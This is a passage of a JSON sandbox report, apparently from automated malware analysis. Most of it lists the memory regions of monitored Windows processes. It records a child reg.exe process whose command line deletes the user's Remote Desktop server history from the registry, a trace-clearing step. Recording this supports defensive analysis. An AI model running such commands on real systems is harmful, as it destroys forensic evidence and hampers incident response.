"end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1302", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:08:11.246", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 589823, "entry_point": 0, "filename": null, "id": "region_1303", "name": "private_0x0000000000050000", "norm_filename": null, "region_type": "private_memory", "start_va": 327680, "timestamp": "00:08:11.250", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 606207, "entry_point": 0, "filename": null, "id": "region_1304", "name": "pagefile_0x0000000000090000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 589824, "timestamp": "00:08:11.250", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 655360, "type": "region", "version": 1 }, "end_va": 659455, "entry_point": 0, "filename": null, "id": "region_1305", "name": "pagefile_0x00000000000a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 655360, "timestamp": "00:08:11.250", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 1638399, "entry_point": 0, "filename": null, "id": "region_1306", "name": "private_0x0000000000150000", "norm_filename": null, "region_type": "private_memory", "start_va": 1376256, "timestamp": "00:08:11.250", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 335872, "start_va": 11403264, "type": "region", "version": 1 }, "end_va": 11739135, "entry_point": 11403264, "filename": "\\Windows\\SysWOW64\\reg.exe", "id": "region_1307", "name": "reg.exe", "norm_filename": "c:\\windows\\syswow64\\reg.exe", "region_type": "memory_mapped_file", "start_va": 11403264, "timestamp": "00:08:11.252", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 1996357632, "type": "region", "version": 1 }, "end_va": 1998098431, "entry_point": 1996357632, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1308", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1996357632, "timestamp": "00:08:11.260", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 1998323712, "type": "region", "version": 1 }, "end_va": 1999896575, "entry_point": 1998323712, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_1309", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1998323712, "timestamp": "00:08:11.261", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_1310", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:08:11.262", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001311-addr_0x000000007efdb000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_812", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_1311", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:08:11.262", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001312-addr_0x000000007efde000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_813", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_1312", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:08:11.262", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001313-addr_0x000000007efdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_814", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_1313", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:08:11.263", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1314", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:08:11.263", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001315-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable" ], "ref_process_dump": { "ref_id": "proc_dump_815", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_1315", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:08:11.263", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_1316", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:08:11.263", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001317-addr_0x0000000000350000-size_0x0000000000080000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_816", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 3473408, "type": "region", "version": 1 }, "end_va": 3997695, "entry_point": 0, "filename": null, "id": "region_1317", "name": "private_0x0000000000350000", "norm_filename": null, "region_type": "private_memory", "start_va": 3473408, "timestamp": "00:08:11.337", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1936785408, "type": "region", "version": 1 }, "end_va": 1937162239, "entry_point": 1937045400, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_1318", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1936785408, "timestamp": "00:08:11.338", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1937178624, "type": "region", "version": 1 }, "end_va": 1937436671, "entry_point": 1937366648, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_1319", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1937178624, "timestamp": "00:08:11.341", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1937506304, "type": "region", "version": 1 }, "end_va": 1937539071, "entry_point": 1937514744, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_1320", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1937506304, "timestamp": "00:08:11.342", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1321", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:08:11.361", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1322", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:08:11.361", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 720896, "type": "region", "version": 1 }, "end_va": 1142783, "entry_point": 720896, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1323", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 720896, "timestamp": "00:08:11.362", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001324-addr_0x00000000001d0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_817", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 1900544, "type": "region", "version": 1 }, "end_va": 1966079, "entry_point": 0, "filename": null, "id": "region_1324", "name": "private_0x00000000001d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1900544, "timestamp": "00:08:11.363", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001325-addr_0x0000000000590000-size_0x0000000000100000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_818", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 5832704, "type": "region", "version": 1 }, "end_va": 6881279, "entry_point": 0, "filename": null, "id": "region_1325", "name": "private_0x0000000000590000", "norm_filename": null, "region_type": "private_memory", "start_va": 5832704, "timestamp": "00:08:11.363", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1959854080, "type": "region", "version": 1 }, "end_va": 1959903231, "entry_point": 1959858401, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_1326", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1959854080, "timestamp": "00:08:11.365", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1959919616, "type": "region", "version": 1 }, "end_va": 1960312831, "entry_point": 1960027059, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_1327", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1959919616, "timestamp": "00:08:11.367", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1960312832, "type": "region", "version": 1 }, "end_va": 1960669183, "entry_point": 1960418214, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_1328", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1960312832, "timestamp": "00:08:11.369", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1964244992, "type": "region", "version": 1 }, "end_va": 1965359103, "entry_point": 1964323539, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_1329", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1964244992, "timestamp": "00:08:11.370", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1965359104, "type": "region", "version": 1 }, "end_va": 1966407679, "entry_point": 1965471469, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_1330", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1965359104, "timestamp": "00:08:11.372", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1966800896, "type": "region", "version": 1 }, "end_va": 1967456255, "entry_point": 1966885349, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_1331", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1966800896, "timestamp": "00:08:11.374", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1967456256, "type": "region", "version": 1 }, "end_va": 1968099327, "entry_point": 1967669207, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_1332", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1967456256, "timestamp": "00:08:11.375", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1968111616, "type": "region", "version": 1 }, "end_va": 1968152575, "entry_point": 1968125600, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_1333", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1968111616, "timestamp": "00:08:11.377", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1968177152, "type": "region", "version": 1 }, "end_va": 1968881663, "entry_point": 1968219250, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_1334", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1968177152, "timestamp": "00:08:11.378", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1970274304, "type": "region", "version": 1 }, "end_va": 1970298879, "entry_point": 1970274304, "filename": "\\Windows\\SysWOW64\\nsi.dll", "id": "region_1335", "name": "nsi.dll", "norm_filename": "c:\\windows\\syswow64\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 1970274304, "timestamp": "00:08:11.380", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1971257344, "type": "region", "version": 1 }, "end_va": 1972240383, "entry_point": 1971324265, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_1336", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1971257344, "timestamp": "00:08:11.389", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1972240384, "type": "region", "version": 1 }, "end_va": 1972342783, "entry_point": 1972259189, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_1337", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1972240384, "timestamp": "00:08:11.391", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1972371456, "type": "region", "version": 1 }, "end_va": 1972658175, "entry_point": 1972401272, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_1338", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1972371456, "timestamp": "00:08:11.393", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 1974140928, "type": "region", "version": 1 }, "end_va": 1974730751, "entry_point": 1974231875, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_1339", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1974140928, "timestamp": "00:08:11.395", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1974927360, "type": "region", "version": 1 }, "end_va": 1975144447, "entry_point": 1974927360, "filename": "\\Windows\\SysWOW64\\ws2_32.dll", "id": "region_1340", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\syswow64\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1974927360, "timestamp": "00:08:11.397", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 1994129408, "type": "region", "version": 1 }, "end_va": 1995153407, "entry_point": 0, "filename": null, "id": "region_1341", "name": "private_0x0000000076dc0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1994129408, "timestamp": "00:08:11.411", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 1995177984, "type": "region", "version": 1 }, "end_va": 1996353535, "entry_point": 0, "filename": null, "id": "region_1342", "name": "private_0x0000000076ec0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1995177984, "timestamp": "00:08:11.412", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_1343", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:08:11.412", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1344", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:08:11.412", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 3997696, "type": "region", "version": 1 }, "end_va": 5603327, "entry_point": 0, "filename": null, "id": "region_1345", "name": "pagefile_0x00000000003d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3997696, "timestamp": "00:08:11.417", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1966407680, "type": "region", "version": 1 }, "end_va": 1966800895, "entry_point": 1966478735, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_1346", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1966407680, "timestamp": "00:08:11.419", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1970339840, "type": "region", "version": 1 }, "end_va": 1971175423, "entry_point": 1970345611, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_1347", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1970339840, "timestamp": "00:08:11.421", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 225279, "entry_point": 0, "filename": null, "id": "region_1348", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:08:11.427", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 1179648, "type": "region", "version": 1 }, "end_va": 1187839, "entry_point": 0, "filename": null, "id": "region_1349", "name": "pagefile_0x0000000000120000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1179648, "timestamp": "00:08:11.427", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 36864, "start_va": 1245184, "type": "region", "version": 1 }, "end_va": 1282047, "entry_point": 1245184, "filename": "\\Windows\\SysWOW64\\en-US\\reg.exe.mui", "id": "region_1350", "name": "reg.exe.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\reg.exe.mui", "region_type": "memory_mapped_file", "start_va": 1245184, "timestamp": "00:08:11.428", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001351-addr_0x0000000000140000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_819", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1314815, "entry_point": 0, "filename": null, "id": "region_1351", "name": "private_0x0000000000140000", "norm_filename": null, "region_type": "private_memory", "start_va": 1310720, "timestamp": "00:08:11.435", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001352-addr_0x0000000000190000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_820", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 1638400, "type": "region", "version": 1 }, "end_va": 1642495, "entry_point": 0, "filename": null, "id": "region_1352", "name": "private_0x0000000000190000", "norm_filename": null, "region_type": "private_memory", "start_va": 1638400, "timestamp": "00:08:11.435", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 6881280, "type": "region", "version": 1 }, "end_va": 8458239, "entry_point": 0, "filename": null, "id": "region_1353", "name": "pagefile_0x0000000000690000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6881280, "timestamp": "00:08:11.435", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 11796480, "type": "region", "version": 1 }, "end_va": 32767999, "entry_point": 0, "filename": null, "id": "region_1354", "name": "pagefile_0x0000000000b40000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 11796480, "timestamp": "00:08:11.436", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 32768000, "type": "region", "version": 1 }, "end_va": 35713023, "entry_point": 32768000, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_1355", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 32768000, "timestamp": "00:08:11.438", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f", "filename": "c:\\windows\\syswow64\\reg.exe", "id": "proc_8", "image_name": "reg.exe", "monitor_reason": "child_process", "monitored_id": 8, "origin_monitor_id": 5, "ref_parent_process": { "ref_id": "proc_5", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000008-region_00001356-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_821", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1356", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:08:11.465", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001357-addr_0x0000000000030000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_822", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_1357", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:08:11.466", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1358", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": 